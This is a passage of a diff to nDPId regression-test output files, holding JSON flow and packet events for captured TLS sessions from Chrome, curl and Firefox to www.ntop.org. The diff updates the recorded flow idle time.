02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1581109434258,"pkt":"KDc3AG3IEBMx8Tl2CABFAAXUL9xAADQG19GyPsWCwKgBDQG7z0OMwKr+Oj0RjoAQAfVXrQAAAQEICiUvy0seKwePAbBkhQkGDSwXAwMFJB7ULkZYT314CXk9r8PlYJygP344H6B+ItT1QydBOUTT\/6D31GPVzKtOQjSVxhbT8njy8fnLCF03csGz4\/Y1RkgUVmI84ERVBP7zbdzqFVMxHmkRU4146\/GYpGt09JudxRaBFBE6RH99GaIPOIBgIxL+lVzyEaqTle8b2ooKlmYXANwIghY6MzW7vfR0m2NAd4\/mImO8\/LyUCeGK0r\/puyNRW7lwQQMAmHKJdbXl9VyEWyHoVGg2V7UztPOOS9FaOf7PI0qXcHmQjpNhC3tUdKXBoA5lr9L4gV9TtzI0jsGqvB9N6GFz+qcMvQNu9oMflyIYBhNXeC+wMS3iHkbmb6YjZ1BITgZEep9Fizk45i3xCMymSmOsda0ujEX4jtgvxVvAdOobavQSODmvW7nF0r5t9e88tMuzTz7+vTqoOaJn4Q5qSGioRtcVHnLq2LNPOuGgbZaLvf8nOa3F\/fTzsfVgOnrof2PK7x6zJRR4iLtFUyiyV0abVTIHELfIYnSCf71pFYSlMWF1kbosbMAxw+8gDHb28maLs7wPXvpNMwUQmC5zWPLwG8e+Pf\/3nur0wrn5EOul2L1tr2PBCGM7nQJnzz+Ftab4qAnCKKMUrufRAVhXA6Ue6CMSRLYliOxzGRgmHVxorbbpx87m7XMCx1xGrv\/+sMpgjOYFPN80vjeb9Ar4xkocVQgWuuKpaWdNDznMzFzG0+H1ekKy8mE\/Y4uj8aty0rTxx\/RK0gYF2CUtsmGNskEzCWUbq5MAqcp05SHkAJHGGJeLVJYaWPvGXbFa5QHn9poomy6DBa+Zu\/J+olJwYCoT+frN77wk+XmgZEGX8LeovmjP4s1R+UbEFUsUMksh6m15XB\/oDSc43HBC0ZN2fBl+EVSpfPjbG\/eOyIfLCt5fbBfnhNgvommX5LE+2Hk1er+ly1V3Bk3SksoPHjYC3atFWwOW8i0ksy3cnSr3r7urFNldk3MU3+jnEXfTimw+aCW1vRMowhmfm8PlgjcufRfy+KbXvWvcglQ5SIZzkHbMTgRIVTH0rnzAvQa5V3qwPK10Uoz7qDIouhn\/mb\/ZISHF6mBR\/IXvmgdDxCQjDF0pzdpHGlijQnscX9IYmuALydf\/N95pDI1Ksot3SwlV+ToeoAcOu03ffeX9ZWtpGReoSSLBreVK2S9eOKb7ts0O5zIIo7KsqQiv\/vBgScz8WXOWpxQ\/yJVR5ay52w6EYcainLIU7Xbc\/tjzrhulig3U\/8LJroIUx7FTN+1M\/XXQgxU1xPwXfZVd2BCyLjPf3LnCxXwnRvsKpAN+jMhuodhLSF7CgHqc20YiiLhRoKoX9HTNFjjp4NCVuyybqoR14grCEsHZOU2qhA+8BZe5VlL7unSunUXcr1PeN9gM5Jq4MVqPdpyzDhvJpSxU3Hx+L1u56H6J0VrRo\/R6fO225uB9ZADFU\/E9+rLvS3XjVihQI4Xj3oV8Yz2DHOUB7myCSIfri88nrYevcoAQbwAgIH3ZuvMVV+F7spgWZOgjijLQs9AFYfhIg77XK7GhiJW4kT1GNIqN\/59u+gIdPmDuGurVucPbruilLRCDIsr+53Us+irmCwo\/E2YPbk4a0f3NX0k+rNo92g1D9wTfG3QFRXLoBVDcr2q9BeW0PVJsavNUQM+jFbQkjfp93AvyPnmEBcWXIT002jYiClr1Y1\/emkCZ90t5YN1lLX5fUvWWgwvQ8NqFZ2zWMZciPkbKDA3g3Y+AskVzW3FFBLqR77\/aXs+9FwMDBSQUQnjU3ptBoEOyx5s5g6C1C+gxkfWLgzLDV66R77tBk395nAfOwKbaxf02lWN9Kl7ER9qk1HP5doNJPo83hbomHGy3aIU4qtqfnGI\/DWje6wuZoh6zDMTlo3NI6IL\/slMBsWm6kBIHkYOp"}
00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":1440,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1581109434258}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 1/1

16
test/results/443-curl.pcap.out
View File

@@ -1,13 +1,13 @@
00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-curl.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581113120474}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113120474,"flow_last_seen":1581113120474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113120474,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113120474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113120474,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7FgtjjAbvMd3aVAAAAALAC\/\/97wQAAAgQFtAEDAwUBAQgKHmJFtwAAAAAEAgAA"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113120512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113120512,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG72OOPktF9zHd2lqAS\/oj9JgAAAgQFrAQCCAolaAqTHmJFtwEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113120513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113120513,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7FgtjjAbvMd3aWj5LRfoAQECwaIgAAAQEICh5iRd0laAqT"}
00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113120474,"flow_last_seen":1581113120474,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113120474,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113120474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113120474,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7FgtjjAbvMd3aVAAAAALAC\/\/97wQAAAgQFtAEDAwUBAQgKHmJFtwAAAAAEAgAA"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113120512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113120512,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG72OOPktF9zHd2lqAS\/oj9JgAAAgQFrAQCCAolaAqTHmJFtwEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113120513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113120513,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7FgtjjAbvMd3aWj5LRfoAQECwaIgAAAQEICh5iRd0laAqT"}
00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","packets-captured":109,"packets-processed":109,"total-skipped-flows":0,"total-l4-data-len":66816,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581113121570}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 109/109

16
test/results/443-firefox.pcap.out
View File

@@ -1,13 +1,13 @@
00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-firefox.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581109488041}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109488041,"flow_last_seen":1581109488041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109488041,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109488041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109488041,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs9oAbstYO2oAAAAALAC\/\/8dyQAAAgQFtAEDAwUBAQgKHivVZQAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109488079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109488079,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7z2h4KhDzLWDtqaAS\/ojkXQAAAgQFrAQCCAolMJ2OHivVZQEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109488079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109488079,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs9oAbstYO2peCoQ9IAQECwBWgAAAQEICh4r1YolMJ2O"}
00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"thread_ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109488041,"flow_last_seen":1581109488041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109488041,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109488041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109488041,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs9oAbstYO2oAAAAALAC\/\/8dyQAAAgQFtAEDAwUBAQgKHivVZQAAAAAEAgAA"}
